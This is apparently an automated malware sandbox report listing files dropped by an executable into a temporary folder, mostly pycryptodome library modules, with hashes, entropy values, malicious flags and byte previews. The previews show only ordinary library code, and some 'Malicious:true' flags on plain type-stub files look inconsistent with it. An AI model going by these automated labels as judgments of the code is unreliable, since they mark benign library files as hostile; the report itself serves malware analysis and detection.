                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ocb.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17920
                                                                                                                                            Entropy (8bit):5.353670931504009
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tPHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8Ng6Vf4A:DPcnB8KSsB34cb+bcOYpMCBDB
                                                                                                                                            MD5:D5DB7192A65D096433F5F3608E5AD922
                                                                                                                                            SHA1:22AD6B635226C8F6B94F85E4FBFB6F8C18B613C8
                                                                                                                                            SHA-256:FAB286E26160820167D427A4AAB14BE4C23883C543E2B0C353F931C89CEA3638
                                                                                                                                            SHA-512:5503E83D68D144A6D182DCC5E8401DD81C1C98B04B5ED24223C77D94B0D4F2DD1DD05AED94B9D619D30D2FE73DFFA6E710664FFC71B8FA53E735F968B718B1D9
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...O..e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ofb.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.741875402338703
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sCF/1nb2mhQtkgU7L9D0E7tfcqgYvEJPb:N2f6L9D5JxgYvEJj
                                                                                                                                            MD5:134F891DE4188C2428A2081E10E675F0
                                                                                                                                            SHA1:22CB9B0FA0D1028851B8D28DAFD988D25E94D2FD
                                                                                                                                            SHA-256:F326AA2A582B773F4DF796035EC9BF69EC1AD11897C7D0ECFAB970D33310D6BA
                                                                                                                                            SHA-512:43CE8AF33630FD907018C62F100BE502565BAD712AD452A327AE166BD305735799877E14BE7A46D243D834F3F884ABF6286088E30533050ED9CD05D23AACAEAB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...O..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\BLAKE2b.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):938
                                                                                                                                            Entropy (8bit):4.770904354494787
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REL4yNT37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:l4DQxMB/qs/qn/rB/MGB/1/s/7B/QVP
                                                                                                                                            MD5:17D9AB9AB96D9645BD7BAA7403392355
                                                                                                                                            SHA1:63DFBC424021764FA0B7BE930C76F99F7D097DAB
                                                                                                                                            SHA-256:2F79FA6D217978DB2C5A7CF297E73E555C2100E86FA5B2CB4C1DEFFCCAE353DF
                                                                                                                                            SHA-512:E6A62201B77C98236B57E93275C666C03CE6D17DF29380D871DA9F55F9D2C01B4EE1901C8C9A95CB7307FD06CCD9CF9CD6FF768693EB30706F236439B253E0D4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\BLAKE2s.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10313
                                                                                                                                            Entropy (8bit):5.368970910734994
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:95vykvbyMiEd5kENruQdltkTH0crO+efxF+vizCL2MiX81FKkJfuNwZk1hITnSHu:9pyMldPth+hN7BNUwZ9SNCUPmnqdWX
                                                                                                                                            MD5:E7B9211FC198253E113A544AE7FF2671
                                                                                                                                            SHA1:3ABC4A031C76DCE50F3F17FF76CF64CFF979DF7D
                                                                                                                                            SHA-256:15151C56BEFE3EB0722AC465E10C96A6A40755517819C8C4B22A83799993F051
                                                                                                                                            SHA-512:B856E5EE5EE334851F6B6756BBD534BBFB2581D9E733E68E93C730F01124AFE93C20422DE3B84817A799500D5B019D5A3F5F0F328CA2BED0E2FF1007542DB7D0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.%.............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.)......)...unhexlify)...bord..tobytes)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._BLAKE2sa..... int blake2s_init(void **state,. const uint8_t *key,. size_t key_size,. size_t digest_size);. int blake2s_destroy(void *state);. int blake2s_update(void *state,. const uint8_t *buf,. size_t len);. int blake2s_digest(const void *state,. uint8_t digest[32]);.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\BLAKE2s.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):765
                                                                                                                                            Entropy (8bit):4.852088276642615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
                                                                                                                                            MD5:43A377A44F7A80190635F78E745C64C3
                                                                                                                                            SHA1:FDDEC7439E99FF7376364061B817E985EC291550
                                                                                                                                            SHA-256:25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
                                                                                                                                            SHA-512:8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\CMAC.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12332
                                                                                                                                            Entropy (8bit):5.3925226668947195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:maXNW0eNCHQ451ekkDlBC+AgE8OV7Igsmowwwwr:mCb3HQ45vkDT9AgJOlZIwwwwr
                                                                                                                                            MD5:9C6838437217CE409FB70A1643FF0121
                                                                                                                                            SHA1:99B39660EE0278E320F6D684761F7398C011BF13
                                                                                                                                            SHA-256:AAC93790529798B037B494A0915923E65778771F117C8BDB8732A8C541574F29
                                                                                                                                            SHA-512:3FE7FA0110E23D61F55BFA053D4507F8655D7265DA99E370C37AC2135A234B45C2507CBE3A2FA79FD240844EE8FF80A216D0110879C49182DFFB49B8BD9BCD23
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eV*.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z...G.d...d.e...............Z.....d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc..........................t...........|...............d.z...|.z...}.t...........|.t...........|.............................t...........|.................d.............S.).N.....).r....r......len)...bs..xor_lsb..nums.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Hash\CMAC.py.._shift_bytesr....$...s@....................!.W..,.C......c.".g.g..&..&...B.....x.y.y..1..1.....c.....................F.....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :var

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\CMAC.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):852
                                                                                                                                            Entropy (8bit):4.7944416507058545
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CNyT3xFFAo6atxyW1W2oILB/jHV/PtN/Iqw+y:c8ihh+2VB/B/PX/Zw/
                                                                                                                                            MD5:2932E4BF5ECDFE63B31A60E94D12EF3D
                                                                                                                                            SHA1:369E08734F3A29B7D68FC99B87C20DCE2945A6C7
                                                                                                                                            SHA-256:8A9787A689F900E660207C419A0C2B66D3D40DB46D09F4EA9C19543640D26F57
                                                                                                                                            SHA-512:723E90748E13290619B03A767ABE5F040149F42E36F6899648F8F450D9297EAC9F560ADBBB1EDCAA2410DF428CBBCAC55D311E6657704B5CA593707CD3496556
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict, Any....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: Dict[str, Any],.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict[str, Any] = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\HMAC.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9093
                                                                                                                                            Entropy (8bit):5.478956840618613
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3lCPUNnj/w4+Q8UGOBV1+1DqsDrWkGK/dMwdC9rO3DPFCTX2MOgcHIh/hBmFK+lt:10XAGmsDrWwXOkAzOnPtwZaS5U
                                                                                                                                            MD5:932A08ECEAE6FF15C5895F15E96DEFD7
                                                                                                                                            SHA1:56882DA332219031DC08879B6B19AF71415D7F9E
                                                                                                                                            SHA-256:29CC54484DAB8862625A980B60343EF4854FF3EDED8443A08BF2E1A3C96E5DE0
                                                                                                                                            SHA-512:F2E3ED56D4BE81429B6E9EE6EB57021F2B27F945A91526ADE6BD42B6E0F4A8D3D148DE365322F7DED5B04447013630601062B326381BB7E9C37FC9C5B399E14C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e. ..............................d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.d...e.....................................D...............Z...G.d...d.e...............Z.d.d...Z.d.S.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c...........................i.|.].\...}.}.|.|.....S...r....)....0..k..vs.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cry

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\HMAC.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):649
                                                                                                                                            Entropy (8bit):4.783061054533155
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
                                                                                                                                            MD5:14A386A671119C5A919A33425DBB267C
                                                                                                                                            SHA1:938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
                                                                                                                                            SHA-256:C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
                                                                                                                                            SHA-512:99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\KMAC128.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):936
                                                                                                                                            Entropy (8bit):4.361612751830179
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                            MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                            SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                            SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                            SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\KMAC256.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):236
                                                                                                                                            Entropy (8bit):4.806129043337596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                            MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                            SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                            SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                            SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\KangarooTwelve.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):588
                                                                                                                                            Entropy (8bit):4.505456264915036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3vJ1ApWaNaFeLsQwRh72CX5BfWaNaFeLsXJaNi4j:1REcT3rA1Npuh717NpsENiS
                                                                                                                                            MD5:42C9FEC1BF1C0D408407E53932837C93
                                                                                                                                            SHA1:12F0171C79E934BF9202A864E6D87404EBDB1BDE
                                                                                                                                            SHA-256:4C18BD17FAE1D883D8710836B105100A6732AEF4639967F09FD1B7BD636E21B0
                                                                                                                                            SHA-512:9FC2C7FBFE0D15D327D6155DDB6613C1BDFC966E7BD2EC0D50CAE0DE981F5A1752B4A303EDFD9D87D68C7A0B2026E082B7F3DD3B40F8426B5CF9E0CF48A64723
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class K12_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> K12_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> K12_XOF: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\MD2.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                            MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                            SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                            SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                            SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\MD4.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):551
                                                                                                                                            Entropy (8bit):4.846633197285402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                            MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                            SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                            SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                            SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\MD5.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7670
                                                                                                                                            Entropy (8bit):5.24039663606852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:9iCykvaEVo/Ed5X82+n3H4aDJDbqOs6Q1Xhe1ztQDa6zSDB7MayxxxxxxxxxxxxE:9cEJooaVbqAQNhiCDpU
                                                                                                                                            MD5:DFE3C51C84E3D8F1D2B051A92BAC0D4B
                                                                                                                                            SHA1:2272A26E6F53317702E9C8D733AB0C46BC16441B
                                                                                                                                            SHA-256:BCA840FEC4513595F0725DA1BDA59F529A1220B7CA2469CCA446603C8BC94F48
                                                                                                                                            SHA-512:74B821B2F0084ABA8613C8A0FCB1FC0EAE205E9A5A098CA285521290710ED250D3CE32191A15BC84EE50CCC6A5790215F390FD646AF28452A5BC06395B452481
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................|.....d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.d.Z.d.Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\MD5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                            MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                            SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                            SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                            SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\Poly1305.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):689
                                                                                                                                            Entropy (8bit):4.617411626220112
